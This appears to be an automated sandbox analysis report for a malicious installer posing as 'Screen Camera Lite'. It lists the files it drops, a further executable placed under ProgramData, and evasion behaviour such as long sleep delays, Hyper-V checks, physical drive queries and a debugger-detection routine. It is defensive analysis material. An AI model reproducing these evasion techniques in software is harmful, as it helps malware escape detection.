        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\libharfbuzz-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\libsigc-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Temp\is-Q11OR.tmp\_isetup\_iscrypt.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\libintl-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Temp\is-Q11OR.tmp\_isetup\_shfoldr.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\libgdk-win32-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-QMR89.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\libpng16-16.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\libpango-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-A0F2H.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Temp\is-Q11OR.tmp\_isetup\_isdecmp.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-CLVH5.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\libgomp-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\libtiff-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\libgraphite2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-1OTIR.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-3OVHD.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-2HDD5.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-9QCH4.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\libgdkmm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-2B9OT.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-DH98H.tmpJump to dropped file
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeFile created: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\libgdk_pixbuf-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\libpcre-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\libpixman-1-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Temp\is-Q11OR.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-LIA5U.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-6D3F1.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-6E6KU.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\zlib1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\uninstall\is-3VPQL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\libgmodule-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeFile created: C:\ProgramData\Escape Division LIB 10.6.45\Escape Division LIB 10.6.45.exeJump to dropped file

        Boot Survival

        barindex
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive02_2_00401A4F
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive02_2_02C7F7D6
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_00402321 GetCommandLineW,CommandLineToArgvW,GetLocalTime,StartServiceCtrlDispatcherA,2_2_00402321
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C1C
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C1C
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004241EC IsIconic,SetActiveWindow,SetFocus,1_2_004241EC
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004241A4 IsIconic,SetActiveWindow,1_2_004241A4
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_00418394
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_0042286C
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004833BC IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_004833BC
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004175A8 IsIconic,GetCapture,1_2_004175A8
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00417CDE IsIconic,SetWindowPos,1_2_00417CDE
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417CE0
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_0041F128 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,1_2_0041F128
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,2_2_00401B4B
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,2_2_02C7F8DA
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeWindow / User API: threadDelayed 9727Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\librsvg-2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-4575S.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\libpangoft2-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-OLFPM.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-1EDIU.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-LI4GH.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-PCJSB.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-AKS9J.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\libglibmm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-9FMQR.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-MLNUS.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\libpangowin32-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-GGBLB.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\libjpeg-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-5J0K7.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-1VK0U.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\liblcms2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\libpangocairo-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-6G4V1.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-Q11OR.tmp\_isetup\_RegDLL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\libgcc_s_dw2-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-MC96J.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\liblzma-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\libgobject-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-HM1KV.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\libpangomm-1.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-OOQC3.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\uninstall\unins000.exe (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\libwinpthread-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\libharfbuzz-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\libsigc-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-Q11OR.tmp\_isetup\_iscrypt.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\libintl-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-Q11OR.tmp\_isetup\_shfoldr.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\libgdk-win32-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-QMR89.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\libpng16-16.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\libpango-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-A0F2H.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-Q11OR.tmp\_isetup\_isdecmp.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\libtiff-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\libgomp-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-CLVH5.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\libgraphite2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-1OTIR.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-3OVHD.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-2HDD5.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-9QCH4.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\libgdkmm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-2B9OT.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-DH98H.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\libpcre-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\libgdk_pixbuf-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\libpixman-1-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-Q11OR.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-LIA5U.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-6D3F1.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\is-6E6KU.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\zlib1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\uninstall\is-3VPQL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Screen Camera Lite\libgmodule-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5692
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-19362
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-18591
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe TID: 7092Thread sleep count: 132 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe TID: 7092Thread sleep time: -264000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe TID: 4020Thread sleep count: 66 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe TID: 4020Thread sleep time: -3960000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe TID: 7092Thread sleep count: 9727 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe TID: 7092Thread sleep time: -19454000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeFile opened: PhysicalDrive0Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00452A4C FindFirstFileA,GetLastError,1_2_00452A4C
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004751F8 FindFirstFileA,FindNextFileA,FindClose,1_2_004751F8
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00464048
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_004644C4
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00462ABC FindFirstFileA,FindNextFileA,FindClose,1_2_00462ABC
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00497A74
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeCode function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B30
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeThread delayed: delay time: 60000Jump to behavior
        Source: screencameralite32_64.exe, 00000002.00000002.2964942696.0000000000B68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
        Source: screencameralite32_64.exe, 00000002.00000002.2964942696.0000000000C56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: screencameralite32_64.exe, 00000002.00000002.2964942696.0000000000C56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW~
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeAPI call chain: ExitProcess graph end nodegraph_0-6732
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeAPI call chain: ExitProcess graph end nodegraph_2-18592
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeAPI call chain: ExitProcess graph end nodegraph_2-19235
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_2-19255
